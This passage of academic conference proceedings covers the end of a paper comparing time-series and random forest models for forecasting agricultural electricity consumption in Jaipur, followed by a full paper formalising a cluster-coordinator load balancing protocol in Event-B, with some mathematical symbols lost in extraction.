tion in the agricultural sector. The time series-based statistical techniques like auto-
regressive integrated moving average (ARIMA), seasonal ARIMA (SARIMA), expo-
nential smoothing (ES) and machine learning based approach like random forest (RF)
are used to forecast medium term load consumption in the agricultural field. The
SARIMA model shows the minimum root mean square percentage error (RMSPE).
The result shows that statistical approach like SARIMA and ES outperforms than
random forest.

M. Sharma (B) · N. Mittal


Department of Computer Science & Engineering, Malaviya National Institute of Technology,
Jaipur, India
e-mail: 2018rcp9099@mnit.ac.in
N. Mittal
e-mail: nmittal.cse@mnit.ac.in
A. Mishra · A. Gupta
Genus Power Infrastructures Limited, Jaipur, India
e-mail: anukram.mishra@genus.in
A. Gupta
e-mail: arun.gupta@genus.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 581
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_47
582 M. Sharma et al.

Keywords Load forecasting · Time-series analysis · SARIMA · Exponential


smoothing · Machine learning · Agriculture sector

1 Introduction

Electricity load forecasting is required for consumer, utility, distributor, and generator
at each level for accurate prophecy as it plays an imperative role in planning. In the
current scenario, while there was a pandemic and lockdown occurred in all over
India, many consumers facing the issue of a huge amount in the bill. The reason
behind this is the utility predict the bills according consumption of the consumer
from the last 4-months consumption pattern, then average it. To resolve similar
kind of issues a proper forecasting technique is required with high accuracy. Energy
demand forecasting is important, but it is a difficult task in the agricultural field due
to multiple factors on which it depends and their varying nature. In the agriculture
sector, existing work on forecasting energy demand depends on trends and factors
relevant to national averages, although energy demand varies by the variation of
weather, crops, area, farm machinery and technologies, pump set, and ground water.
Concerning enhancement of the yield proper management of irrigation is required.
As pumping irrigation depends on electricity, there is a need to forecast electricity
consumption in the agricultural sector [1].
There has been a rapid growth in electricity consumption in every sector and the
agriculture sector also has a sharp growth. The agriculture sector shares 17.49% of the
total consumption of electricity in the year 2018–19 [2]. There is an annual increment
occurs for electricity consumption in the agriculture sector and it changes according
to the crop seasons. The supplied electricity is subsidized or somewhere it is free and
most of the areas are unmetered. The farmer needs incentives for growing appropriate
crops but due to unmetered they are wrongly blamed for highly power consumption
and they face the problem of poor-quality electricity. Most of the electricity provided
in the agriculture sector is subsidized. If proper forecasting is done in the agriculture
sector then it provides benefits to framers, utility, and government. To truly estimate
the electricity consumption, need to deploy meters in the field. In this paper, both flat
and metered electricity consumption are considered to estimate future consumption.
The sector-wise energy consumption in India is descriptively shown in Fig. 1, as
per the 2011 census, 61.5% population of India is rural and dependent on agriculture,
this sector contributes 14.4% in Indian GDP (as per 2018–19 economy survey) [3].
If the proper forecasting of the electricity consumption is done according to the
season then it creates a profit to framer and to utilize the resources available at the
season.
There are four types of load forecasting exist on the basis of time horizon: Very
small term load forecasting (VSTLF) for predicting minutes to hour ahead load
consumption, small term load forecasting (STLF) for predicting day to week ahead
load consumption, medium term load forecasting (MTLF) for accurately predicting
the load two weeks or three years ahead and long-term load forecasting (LTLF)
Analytical Machine Learning for Medium-Term Load Forecasting … 583

Fig. 1 Category-wise energy consumption in India 2001–2019[3]

to predict more than three years ahead future load [4]. In this paper, we predict
one year ahead electricity consumption in agricultural sector using different type of
forecasting techniques.
There are so many forecasting techniques exist, they are classified into two parts
[4, 5]:
(a) Statistical approach: The statistical approach is further classified in Time
series analysis and Regression Techniques [6].
(b) Intelligent approach: fuzzy logic, machine learning and deep learning
techniques.
In this paper, we focus on time series analysis, in which the projected consump-
tion depends on its previous historical consumption. Four techniques are applied
on dataset, auto-regressive integrated moving average (ARIMA), seasonal ARIMA
(SARIMA), exponential smoothing (ES) and random forest (RF), among these
SARIMA shows better results.
This paper is organized as follows. Section 2 specifies the work done to fore-
cast electricity consumption based on different indicators. Section 3 provides
details of proposed methodology used for forecasting the pattern of consumption.
Section 4 contains the information regarding result achieved by different forecasting
techniques. Section 5 provides conclusion and future work.

2 Literature Review

In this section, a detailed view of work done for energy consumption forecasting is
given. Energy indicators are used to identifying the trends and key drivers to optimize
584 M. Sharma et al.

energy consumption. Energy indicators are selected and decided by their correlation
coefficient analysis with the qualified output and their accuracy depends on the perfor-
mance. Three types of energy indicators are defining: Social, economic, and envi-
ronment according to “Energy Indicators for Sustainable Development: Guidelines
and Methodology” [7].
In [8], economic indicators are used to forecast electricity consumption in the
agricultural sector. Electricity prediction depends on the population, per capita GDP,
and farming land. The artificial neural network applied to forecast electricity where
input neurons are the economic indicators and the output variable is the AS-EC
(agriculture sector- electricity consumption).
In [9], the IoT based approach proposed that diagnose, monitor, and control the
factors that affect crop yield and optimize the requirement of the irrigation. The author
considered the temperature, humidity, and soil moisture as a parameter that needs
analyses for optimally watering. Sensors are implemented in the field to measure the
soil moisturization, accordingly, the water need of the crop in future is analysis.
In [10], an ARIMA model is used to forecast electricity consumption in an insti-
tution and proposed that the monthly time series gives better results than bi-monthly
and quarterly time series. The dataset is related to the health care institute. Finally,
an equation is given based on the selected model. The model, which has minimum
SSE and MPE error, is selected to forecast electricity consumption.
A season-based model is given in [11], in which a short-term load forecasting
performed using ARIMA, SARIMA and neural network, RNN, and RNN with
average true range (ATR). Comparing the model performance and select the best
model which gives fewer errors according to the energy management system. The
model forecasted for three seasons, May-June, July-September, October-December,
and among the five model RNN with ATR gives better results according to different
seasons, but every season has a different model to forecast future values.
An ARIMA model is used to forecast seven-year electricity consumption in
different sectors. Each sector has a different model of ARIMA (p,d,q) of auto regres-
sion, difference, and moving average. This paper considers domestic, commercial,
and industrial sectors, and the agricultural sector is untouched [12].
In [13], a model proposed for short term load forecasting using random forest and
the multi-layer perceptron and predict the one week ahead electrical load data.

3 Material and Methods

3.1 Dataset

The monthly electricity consumption data is collected from Jaipur Vidyut Vitran
Nigam Limited (JVVNL). In data pre-processing, we select only agricultural flat
and metered energy consumption data. The data are monthly collected from the year
January 2015- April 2020. We train the model from January 2015-December 2019
Analytical Machine Learning for Medium-Term Load Forecasting … 585

Fig. 2 Auto ARIMA model for forecasting electricity consumption where x-axis shows the year
and y-axis represent electricity consumption in Lakh Unit

and test the model form Jan 2020-April 2020 and forecast the electricity consumption
pattern for next year.

3.2 Methodology

3.2.1 ARIMA Model

ARIMA model is the combination of moving average and auto regressive with inte-
grated differencing. The accurate load forecasting for a time lag or multiple time lag in
the future can be predicted using historical consumption data. Firstly, transform input
data into stationary time series data and then using auto correlation function (ACF)
and partial ACF to get the order of auto regressive (AR), moving average (MA),
seasonal AR (SAR), and seasonal MA (SMA). Moving Average (MA) process of
order q has an ACF that cut off after q lags. Partial ACF (PACF) helps to obtain the
order of an AR(p) process, an auto regressive (AR) process of order p, an AR(p), has
a PACF that cut off after p lags. The aim of transforming into stationary time series
because one part of the time series is equal to the other part of the time series [10].
One year ahead forecasted pattern of electricity consumption is shown in Fig. 2.

3.2.2 SARIMA Model

SARIMA(p,d,q,P,D,Q)s has two parts: Non-seasonal part(p,d,q) and seasonal


part(P,D,Q)s [5].
a. Time series analysis and transformation to remove trend and variance.
b. ACF to decide the order of MA(q), SMA(Q)
c. PACF to decide the order of AR(p)
d. Select the model which have the least AIC (Akaike Information Criteria), least
SSE error, and Ljung-Box Q-statistics test.
e. Estimate and fit the model to time series.
586 M. Sharma et al.

Fig. 3 a Monthly electricity consumption, b log transformation of time series data, c difference of
the log transformation to remove trend, d stationary form of data

Step-1: Transforming the time series data into stationary time series using differ-
ence and log transformation and remove the trend and seasonality to make this
stationary. The transformation of the monthly electricity consumption data into
the stationary data given in Fig. 3, Where X-axis shows time and Y- axis shows
electricity consumption (EC) in agricultural sector.
Step-2 ACF and PACF at different time lags able to decide degree of moving
average and auto regressive. The degree of MA is determine using ACF which is
1 and there is seasonal component after lag 12 so the degree of Q is 5. The degree
of p is 0 or 1 and the degree of P is 1 decided by the PACF.
Step-3 Model Selection: The best model among (0,0,0,0,0,0) to (1,1,1,1,1,5) on
the base of AIC and SSE value. The model ARIMA (1,1,1,0,1,2) gives minimum
AIC value and less SSE. Then, fit the model to forecast future values.
Step-4 Ljung-Box test, for residuals, shows there is no correlation among the
residuals.
Step-5 Fit model in the time-series: among the best model which has less AIC
and SSE value is selected for forecasting the electricity consumption. The pattern
of forecasted electricity consumption shown in Fig. 4 by SARIMA model.

3.2.3 Exponential Smoothing

The exponential smoothing is performed by Holt-Winters function, which is based


on level, trend and seasonality parameters: α, β, Y, respectively [14]. Actual versus
Analytical Machine Learning for Medium-Term Load Forecasting … 587

Fig. 4 Forecasted Model using SARIMA

Fig. 5 Actual v/s forecasted graph of electricity consumption, where the black line represents
actual value and the red line shows the predicted value

forecasted representation of the electricity consumption using Holt-Winters model


shown in Fig. 5, where black line shows actual electricity consumption and red line
shows the predicted electricity consumption.

3.2.4 Random Forest

One of the most important usages of machine learning [15] is we can utilize machine
learning algorithms like random forest (RF) to identify the important features. In
time series, data important features are the time lag. RF creates a new time series
with 12 months of lag values to predict the current observation. RF is used to identify
which of these set of values most important for predicting the current values.
The value from two time period ago t-2 is most important, followed by value at
present time t as given in Fig. 6. The most important time lag observations which
predict the current value of the response variable are t, t-10, t-9, t-2.
588 M. Sharma et al.

Fig. 6 Random variable


with 12 months lag values

4 Experimental Result and Discussion

4.1 The Experimental Result Using ARIMA Model

The forecasted value of electricity consumption using ARIMA (0,1,9) model is repre-
sented in Fig. 7. Parameters like moving average related to ARIMA model are given
in Table 1.

Fig. 7 Actual and forecasted electricity consumption using auto ARIMA model

Table 1 Parameter
Coefficient Value Standard error
estimation using
ARIMA(0,1,9) model ma1 −0.5485 0.1359
ma2 −0.2382 0.1391
ma3 −0.5343 0.1510
ma4 0.5229 0.1515
ma5 0.0366 0.1489
Analytical Machine Learning for Medium-Term Load Forecasting … 589

Table 2 Coefficient and


coefficient Value Standard error
Standard Error of model
SARIMA (1,1,1) (0,1,2) ar1 0.6381 0.1224
ma1 −0.9999 0.0528
sma1 −0.3094 0.2184
sma2 0.9956 0.8695

Fig. 8 Actual and forecasted electricity consumption using SARIMA model

4.2 The Experimental Result Using Seasonal ARIMA Model

The electricity consumption effected by the months/ seasons. The coefficient and
standard error of model SARIMA (1,1,1) (0,1,2) are shown in Table 2. Two year
ahead forecasted electricity consumption pattern is given in Fig. 8 where blue line
represents forecasted consumption and black line represents the actual electricity
consumption.

4.3 The Experimental Result Using Exponential Smoothing


Model

Smoothing parameters: alpha: 0.1892999, beta: 0, gamma: 1, where alpha shows


level, beta shows trend its value is 0 so the series is not dependent on the trend,
gamma is the seasonality there is the highest effect of the gamma.

Fig. 9 Actual and forecasted electricity consumption using exponential smoothing


590 M. Sharma et al.

Table 3 Coefficients of parameter using Holt-Winters model


Time Series Model parameters
a 20,565.09208 b 51.83786 S1 11,889.77579
S2 15,912.37364 S3 19,475.89710, S4 −16,390.91766
S5 −13,676.23587 S6 −12,675.19334 S7 −7218.14823
S8 −4514.08110 S9 1980.70777 S10 1315.53855
S11 4990.68773 S12 9854.38792

Two year ahead electricity consumption pattern is represented in Fig. 9, where blue
line denotes the forecasted consumption and black line represents actual consump-
tion. The smoothing parameter shows that there is no effect of trend and there is
much effect of seasonality. The coefficient of 12 months is shown in Table 3.

4.4 The Experimental Result Using Random Forest Model

In random forest, the most important time lag observations which predict the current
value of the response variable are t, t-10, t-9, t-2. The electricity consumption pattern
is shown in Fig. 10 using random forest, where red line denotes predicted electricity
consumption and blue line represents actual electricity consumption.

Fig. 10 Actual and forecasted electricity consumption using Random Forest

Table 4 Forecasted electricity consumption from Jan-20 to April-20 using different models
Month Actual ARIMA SARIMA Holt-Winters (ES) Random Forest (RF)
Jan-20 30,245.96 28,266.80 34,850.36 32,506.71 31,198.37
Feb-20 40,777.96 31,655.47 38,691.08 36,581.14 34,794.27
Mar-20 45,793.18 28,248.96 42,704.76 40,196.50 28,699.55
Apr-20 4860.68 17,126.34 4665.74 4381.53 8737.55
Analytical Machine Learning for Medium-Term Load Forecasting … 591

Table 5 Comparatively analysis of the selected model


Model SSE RMSE RMSPE (%) AIC
ARIMA 2,243,074,512.00 11,676.718 98.149 1235.43
SARIMA 29,062,478.00 2963.610 8.937 797.98
Holt-Winters 63,318,016.00 3683.634 10.104 –
Random Forest 31,012,858.642 5568.919 10.922 –

The comparatively analysis of experimental work is given in Tables 4 and 5.


Validation of the work is done from the month of Jan-20 to Apr-20, among four
forecasting models (ARIMA, SARIMA, ES and RF), SARIMA outperforms better
than other forecasting techniques as shown in Table 4. The sum of square error (SSE),
root mean square error (RMSE) and root mean square percentage error (RMSPE)
and AIC values are least for SARIMA model as shown in Table 5. The exponential
smoothing is better for monthly forecasting instead of quarterly forecasting.

5 Conclusion and Future Work

Electricity demand forecasting is the crucial aspect for every sector planning and
monitoring the electricity consumption by the utility, and if proper utilization of the
available resource is done, it gives benefits to government, consumer, and utility.
Agriculture is one of the sectors which depends on electricity and there is a need
to forecast the demand for their requirement according to the season/ monsoon. In
the proposed work, a time series-based mid-term load forecasting is performed to
determine the month-wise electricity consumption pattern in the agricultural sector.
The dataset contains historical electricity consumption data of agricultural sector
and different type of statistical and machine learning techniques are used to train
the dataset to predict one year ahead electricity consumption in agricultural sector.
ARIMA, seasonal ARIMA, exponential smoothing, and random forest techniques
are used to forecast future electricity consumption pattern. The result shows that
SARIMA outperforms among the four models as it shows less error in terms of
RMSE and RMSPE.
To forecast electricity consumption accurately in the agriculture sector, historical
data is not sufficient, but there is an effect of weather, level of groundwater as well
as the type of crops. Thus, in future, regression techniques or intelligent algorithms
can be used for forecasting electricity consumption in the agricultural field.

Acknowledgements The work was supported by Genus Power Infrastructures limited and author
would like to thank the FICCI and SERB which provide funds under the Prime Minister’s Fellowship
for Doctoral Research (PMRF). The author is also grateful to Jaipur Vidyut Vitran Nigam Limited
(JVVNL) for their support and providing the original dataset.
592 M. Sharma et al.

References

1. Moulik, T. K., Dholakia, B. H., & Shukla, P. R. (1990). Energy demand forecast for agriculture
in India. Economic and Political Weekly, A165-A176.
2. http://www.mospi.gov.in/sites/default/files/publication_reports/ES_2020_240420m.pdf
3. http://www.cea.nic.in/reports/others/planning/pdm/growth_2019pdf
4. Eskandarnia, E. M., Kareem, S. A., & Al-Ammal, H. M. (2018). A review of smart meter load
forecasting techniques: Scale and horizon. In IEEE conference April.
5. Cai, M., Pipattanasomporn, M., & Rahman, S. (2019). Day-ahead building-level load forecasts
using deep learning vs. traditional time-series techniques. Applied Energy, 236, 1078–1088.
6. Aprillia, H., Yang, H. T., & Huang, C. M. (2020). Statistical Load Forecasting Using Optimal
Quantile Regression Random Forest and Risk Assessment Index. IEEE Transactions on Smart
Grid.
7. Vera, I., & Langlois, L. (2007). Energy indicators for sustainable development. Energy, 32(6),
875–882.
8. Saravanan, S., & Karunanithi, K. (2018). Forecasting of electric energy consumption in Agri-
culture sector of India using ANN Technique. International Journal of Pure and Applied
Mathematics, 119(10), 261–271.
9. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2019). IoT and agriculture data analysis for smart farm. Computers and Electronics
in Agriculture, 156, 467–474.
10. Kaur, H., & Ahuja, S. (2017). Time series analysis and prediction of electricity consumption of
health care institution using ARIMA model. In Proceedings of Sixth International Conference
on Soft Computing for Problem Solving, pp. 347–358. Springer, Singapore.
11. Panapongpakorn, T., & Banjerdpongchai, D. (2019, January). Short-term load forecast for
energy management systems using time series analysis and neural network method with average
true range. In 2019 First International Symposium on Instrumentation, Control, Artificial
Intelligence, and Robotics (ICA-SYMP), pp. 86–89. IEEE.
12. Katara, S., Faisal, A., & Engmann, G. M. (2014). A time series analysis of electricity demand
in Tamale, Ghana. International Journal of Statistics and Applications, 4(6), 269–275.
13. Moon, J., Kim, Y., Son, M., & Hwang, E. (2018). Hybrid short-term load forecasting scheme
using random forest and multilayer perceptron. Energies, 11(12), 3283.
14. Gardner, E. S., Jr. (2006). Exponential smoothing: The state of the art—Part II. International
Journal of Forecasting, 22(4), 637–666.
15. Moon, J., Kim, J., Kang, P., & Hwang, E. (2020). Solving the cold-start problem in short-term
load forecasting using tree-based methods. Energies, 13(4), 886.
Formal Modelling
of Cluster-Coordinator-Based Load
Balancing Protocol Using Event-B

Shantanu Shukla, Raghuraj Suryavanshi, and Divakar Yadav

Abstract Distributed system is a set of autonomous nodes or sites. Due to uneven


distribution of work, some sites may become overloaded and other may be under-
loaded or ideal. Proper load balancing is required for better resource utilization. It
will be more effective when sites are arranged in the form of a cluster. In cluster-
coordinator-based approach, group of site construct clusters and each cluster will
have one coordinator. The coordinator site keeps track of information of each site
with its load value in the form of vector. If any site of the particular cluster transfer
load to other site is present in same or different cluster, it will inform to coordinator to
update its vector value. If none of the sites is available to adjust load, then the coordi-
nator site must balance the load to transfer load to different clusters. In this paper, we
formalize the cluster-coordinator-based load balancing using Event-B. Event-B is a
formal method to mathematically verify the correctness of protocol in a distributed
environment.

Keywords Formal modelling · Formal verification · Event-B · Load balancing ·


Coordinator

1 Introduction

In the hierarchical distributed system method, the network is divided into many
clusters. Each cluster has set of sites. Due to uneven distribution of the load, sites
may be underloaded or overloaded. In each cluster, there is one coordinator where

S. Shukla (B) · R. Suryavanshi


Pranveer Singh Institute of Technology, Kanpur, India
e-mail: shantanushukla20@hotmail.com
R. Suryavanshi
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow, India
e-mail: divakar_yadav@rediffmail.com

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 593
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_48
594 S. Shukla et al.

all information of every site is stored which helps to take decision in the cluster. The
coordinator maintains a vector stamp to store load information of every site. If any
site transfers load to other site in same cluster, then the corresponding load value
will be changed. The coordinator site also decides to transfer load to other clusters
because of not fulfilling the load transfer request within the cluster. The site contains
the load information, and it will be processed according to the request of the users
[1, 2]. If any site is overloaded, coordinator checks the presence of underloaded site
in its vector table. If it finds, then load transfer will take place in same cluster and
vector value will be updated. If none of the sites are available for granting the load
because of threshold, then the coordinator will send the load to the coordinator of
another cluster [3–5].
In this paper, formal modelling [6] and verification of load transfer are done using
Event-B. Event-B is a formal method which suits to specify properties of distributed
system. We formalize each step of modelling with the help of functions, relations
and other mathematical objects used in discrete mathematics. The Event-B model is
represented by machine and context. The context of model shows static part having
declaration of sets, constants and axioms, and machine represents that dynamic part
contains variables, invariants, theorem and events [7–9].
The remainder of this paper is organized as follows: Section 2 briefly outlines the
Event-B, Sect. 3 describes the cluster-coordinator load balancing protocol, and Sect. 4
presents the formal development of load balancing protocol. Section 5 concludes the
paper.

2 Event-B

Event-B [10–13] is a formal method for modelling and verification of the system.
Formal methods are mathematical techniques to specify system behaviour. It is used
to formalize and verify functions of the system. Event-B uses the notations of discrete
mathematics logic to specify properties and functionalities of system. Event-B model
is represented in terms of variables, invariants, axioms and set of events. Invariants
represent properties of system which should never be changed during execution.
Event-B model produces proof obligations which should be discharged in order to
verify correctness of system. Events in B model represent system behaviour through
its guards and list of actions [14, 15].

3 Cluster-Coordinator Load Balancing Protocol

In cluster-coordinator-based protocol, all sites are arranged in the form of cluster. A


coordinator is declared in each cluster. Coordinator site keeps track of load value of
all sites with the help of vector. When a load is applied on any site, its load value
will be updated and vector of the coordinator will also be updated. Length of vector
Formal Modelling of Cluster-Coordinator-Based Load … 595

utilizes all site information. The vector load of the cluster will help to know the load
status of each site. When load value of any site is more than threshold value, it is
known as overloaded site. Either the load of this overloaded site may be adjusted in
same cluster (when sites are available in same cluster to take extra load) or it will
be transferred to different clusters (due to unavailability of adjusting sites in same
cluster and transferring extra load may cause to overload them).

4 Formal Development of Load Balancing Protocol

In our system model, SITE and CLUSTER are declared as carrier set representing set
of sites and clusters, respectively. In the static part of model, we declare clusterstatus
as enumerated set having values underloaded, overloaded. The set loadtrsstatus is
also an enumerated set having values disable or enable. The discussion of variables
and invariants (see Fig. 1) is as follows:
(a) The variable clustergroup is defined as power set of the site.
(b) The variable clustersitestatus specifies that status of the cluster is either
underloaded or overloaded.
(c) The variable loadval represents that the load value of every site will be a natural
number.
(d) Any site can work as coordinator. The variable coordinator is subset of SITE
set.
(e) Variable vlsc shows the vector load stamp of coordinator. Whenever load value
of any site is increased or decreased, the vector load stamp of coordinator in
the cluster will be updated with the latest load value of the site. It is modelled
as:

vlsc ∈ S I T E → (S I T E → N)

Variables: , clustergroup, clustersitestatus, loadval, coordinator, vlsc, clus-


tercoordinaor, loadstatus, trloadval

inv1 : clustergroup (SITE)


inv2 : clustersitestatus SITE → clusterstatus
Inv3 : loadval SITE →
Inv4 : coordinator SITE
Inv5 : vlsc SITE →(SITE → )
Inv6 : clustercoordinator clustergroup → SITE
Inv7 : loadstatus SITE → loadtrsstatus
Inv8 : trloadval SITE →

Fig. 1 Variables and invariants of the Event-B model


596 S. Shukla et al.

The vector vlsc (Si) (Sj) represents the load value of site Sj known to coordinator
Si.
(f) The variable clustercoordinator shows the total function from clustergroup to
SITE. It specifies coordinator site of each cluster. The mapping of the form cc
mss: clustercoordinator specifies that site ss is coordinator of cluster cc.
(g) The variable loadstatus specifies load transfer status of site. If site is ready to
transfer the load or receiving the load, its status will be enabled, otherwise it
will be disabled.
Description of Events:
(A) Creating Group of Clusters: This event models creation of cluster which
contains set of sites (see Fig. 2). The guard grd1 shows that cc is group of
SITE. This group is not present in existing cluster group as ensured by guard
grd2. This event adds cluster cc to cluster group.
(B) Deciding Coordinator in Cluster: This event specifies the selection of coor-
dinator in each cluster (see Fig. 3). In this event, we choose the coordinator
and ensure that every cluster must have one coordinator. Site ss is in cluster
cc (grd3), and it has not been chosen as coordinator yet is specified as grd4.
Due to the occurrence of this event, site ss is selected as coordinator of cluster
group cc (act1).

Fig. 2 Event of the created


cluster group Create clustergroup
ANY cc
WHERE
grd1 : cc (SITE)
grd2 : cc (clustergroup)
THEN
act1 : clustergroup clustergroup cc
END

Fig. 3 Choose the


coordinator Decide coordinator in cluster
ANY cc, ss
WHERE
grd1 : cc clustergroup
grd2 : ss SITE
grd3 : ss {cc}
grd4 : (cc ss) clustercoordinator
THEN
act1 : clustercoordinator(cc) ss
END
Formal Modelling of Cluster-Coordinator-Based Load … 597

Fig. 4 Load submission

(C) Load Submission: When any new site is joined in the cluster, we check the
load value. Load value is a natural number that is either greater than or less
than the threshold. Every site in the cluster maintains a load value, and the
coordinator site also maintains a vector load stamp. Load submission event is
shown in Fig. 4. Load ld is a natural number which is defined by guard (grd5).
The guard grd3 ensures that site ss is coordinator of cluster cc. The guards
grd6 and grd7 specify that site ss1 is from cluster cc. The load value of site ss1
is increased by load ld as shown in act1. The vector load stamp of coordinator
ss will be updated as increased load value of site ss1 (act2).
(D) Checking Load Status of Site: This event specifies the status of site as under-
loaded or overloaded (Fig. 5). If load value of site is less than threshold, we
consider that site as underloaded, and if the load is greater than threshold then
it is known as overloaded. In Fig. 5, we check the load status, and site ss1 is
SITE and belongs to the domain of load value (grd1 and grd2). If the load
value of ss1 is less than the threshold (grd3) of Fig. 5a, then status of clustersite
ss1 is underloaded (act1). If the load value of ss1 is greater than the threshold
(grd3) of Fig. 5b, then the clustersite status of ss1 is overloaded (act1).
(E) Sending Load to Coordinator Site: In this event, if any site is overloaded, load
will be sent to coordinator site and load vector value vlsc will be updated
(Fig. 6). The load value of ss1 is greater than the threshold, and the load status
of ss1 is enabled for sending the load as ensured by guards grd10 and grd11,
respectively. In the action, we ensure that site ss accepts load by enabling the
load status. Load value of ss1 is decreased by load ld (act2). The load vector
of coordinator site ss will be updated as load value of site ss1.
(F) Receiving Load From Overloaded Site: This event models transferring of load
to coordinator site (Fig. 7). Load ld is the load value of site ss1, and it is greater
than threshold as ensured by the guard (grd8 and 9). The load status of site ss
598 S. Shukla et al.

Check the load status (Underloaded)


ANY ss1
WHERE
grd1 : ss1 SITE
grd2 : ss1 dom(loadval)
grd3 : loadval(ss1) ≤ threshold
THEN
act1 : clustersitestatus(ss1) underloaded
END
(a)
Check the load status of cluster (overloaded)
ANY ss1
WHERE
grd1 : ss1 SITE
grd2 : ss1 dom(loadval)
grd3 : loadval(ss1)>threshold
THEN
act1 : clustersitestatus(ss1) overloaded
END
(b)

Fig. 5 Checking load status of site

is enabled (grd10). If all the guards are true, then actions would be performed.
Load value ld is added to site ss (act1), and vector load stamp of coordinator
will be updated as increased value of load ld (act2).
(G) Transferring load Within Cluster: After receiving the load from the overloaded
site, the coordinator site searches the underloaded site which can take load and
balance all the sites in the cluster (Fig. 8). The guards gr4 and grd5 ensure
that coordinator site ss is overloaded. The guards grd9 and grd10 specify that
underloaded site s is present in cluster cc. Due to the occurrence of this event,
load ld is decreased from site ss (act1) and vector load stamp of coordinator site
ss is updated with decreased value of load ld (act2). The action act3 specifies
that transfer load value of site ss is set to as ld.
(H) Receiving of Load by Underloaded Site: This event models the receiving of
load from coordinator site (Fig. 9). During receiving of load, it should be
ensured that load value of underloaded site should not be greater than the
threshold value. The guards grd7 and grd8 specify that status of site s and ss
is underloaded and overloaded, respectively. Site ss is the coordinator site of
cluster cc (grd9). The guard grd11 specifies that after receiving load ld from
coordinator site ss, load value of site s is less than threshold value. Due to
the occurrence of this event, load value of site s is increased by ld (act1) and
Formal Modelling of Cluster-Coordinator-Based Load … 599

Fig. 6 Sending load to coordinator site

Fig. 7 Receiving load from overloaded site


600 S. Shukla et al.

Fig. 8 Transferring load within the cluster

Fig. 9 Receiving of load by underloaded site


Formal Modelling of Cluster-Coordinator-Based Load … 601

Fig. 10 Transferring load from coordinator to other cluster

vector load of coordinator site ss will be updated as increased value of load of


site s.
(I) Transferring Load from Coordinator to Other Cluster: This event models the
transferring of load from coordinator to other underloaded cluster (see Fig. 10).
The guards grd2, gr3 and grd4 ensure that ss1 is coordinator of cluster cc.
Similarly, guards grd6, grd7 and grd8 ensure that ss2 is coordinator site of
cluster cc2. The status of sites ss1 and ss2 is overloaded (grd9) and underloaded
(grd10), respectively. The guard grd15 ensures that after taking load ld from
ss1, load value of ss2 should be less than threshold. This event updates the
load value and vector load of coordinator ss1 through actions act1 and act2.
The action act3 records load ld as transferred load value of coordinator site
ss1.
(J) Receiving Load From Overloaded Cluster: This event models receiving of
load from overloaded cluster (Fig. 11). The guards grd2, grd3, grd4 and grd5
specify that ss1 is overloaded coordinator site of cluster cc. Similarly, guards
grd7, grd8, grd9 and grd10 specify that ss2 is underloaded site of cluster cc2.
The guard grd13 ensures that after taking load ld, load value of site ss2 should
not cross threshold value. Due to the occurrence of this event, load ld will be
transferred to ss2 and its load value will be updated (act1). The vector load
602 S. Shukla et al.

Fig. 11 Receiving load from overloaded cluster

value of coordinator ss2 will also be updated as increased load value of ss2
(act2).

5 Conclusion

In the cluster-coordinator (C-C)-based approach, sites are arranged in the form of


clusters. Each site is assigned with load value. This load value indicates number of
tasks submitted at site. Due to uneven load, few sites may become overloaded and
others may be underloaded. Initially, load from heavily loaded site is transferred to
other underloaded site within same cluster. If load transfer is not possible in same
cluster due to unavailability of underloaded node, it will be transferred to site present
in different clusters. In order to communicate with another cluster, coordinator site is
selected from each cluster. We have used Event-B as formal method for verification
of our model. We have used RODIN platform, which provides environment to write
specification and discharge proof obligations generated by model. Proof methods
verify the well-defined condition of events and invariants. In this model, ninety-
three proof obligations are generated in total, out of which sixty-nine discharged
automatically while twenty-four discharged manually.

Acknowledgements This work is done under the Distributed Load Balancing and System Recovery
(DLSR) project governed by Uttar Pradesh Council of Science and Technology and supported by
PSIT College Kanpur.
Formal Modelling of Cluster-Coordinator-Based Load … 603

References

1. Singhal, M., & Shivratri, N. G. (2005). Advanced Concepts in Operating Systems. India: Tata
Mc- GrawHill Book Company.
2. Alakeel, A. M. (2010). A guide to dynamic load balancing in distributed computer system.
International Journal of Computer Science and Network Security, 10(6).
3. Benmohammed Mahieddine, K. (1991). An evaluation of load balancing algorithm for
distributed systems. School of Computer Science.
4. Yank, J., Ling, L., & Li, H, A hieratical load balancing strategy considering communi-
cation delay overhead for large distributed computing systems. Mathematical Problems in
Engineering, 16 article id: 5641831.
5. Alakeel, A. M. (2016). Application of fuzzy logic in load balancing of homogeneous distributed
system. International Journal of Computer Science & Security (IJCSS), 10(3).
6. Elsayed, E., El Sharawy, G. & El- Sharawy, E. (2013) Integration of automatic provers in
event-B patterns. International Journal of Software engineering & Application (IJSEA), 4(1).
7. Wen Su, Jean Raymond Abrial, Huibiao Zhu “ Formalizing Hybrid system with Event-B and
Rodin platform” Science of computer programming, pp 164–203, April 2014.
8. Abrial, J. R. (1996). The B Book: Assigning programs to meaning. New York, NY, USA:
Cambridge University Press.
9. Sheng Rong Zou, Li Chen, “Comparison of Event-B and B Method: Application in Immune
System” Yangzhou University College of Information Engineering, Jiangsu, China, June 2018.
10. Abrial, J.-R. (2010). Modelling in Event-B: System and Software Engineering (1st ed.). New
York, NY, USA: Cambridge University Press.
11. Rodin Project, RODIN – Rigorous Open Development Environment for Complex Systems,
2004–2007. <http://rodin.cs.ncl.ac.uk/>.
12. Butler, M.: An Approach to Design of Distributed Systems with B AMN. In: Proc. 10th Int.
Conf. of Z Users: The Z Formal Specification Notation (ZUM), LNCS1212, pp. 223–241,
(1997).
13. Butler M. and Walden, M.: Distributed System Development in B. In: Proc. of 1st Conf. in B
Method, Nantes, pp. 155–168, (1996).
14. Raghuraj Suryavanshi, Divakar Yadav “Modelling of Distributed Mutual Exclusion System
using the Event-B” Jan Zizka (Eds): CCSIT, SIPP, AISC, PDCTA – 2013 pp. 477–491, 2013.
© CS & IT-CSCP 2013.
15. Hoang, T. S. An Introduction to the event B modelling method. In Industrial Deployment of
System Engineering Methods, Springer, Alexander Romanovsky, Martyn Thomas, pp. 211–236.
Regression Test Case Selection:
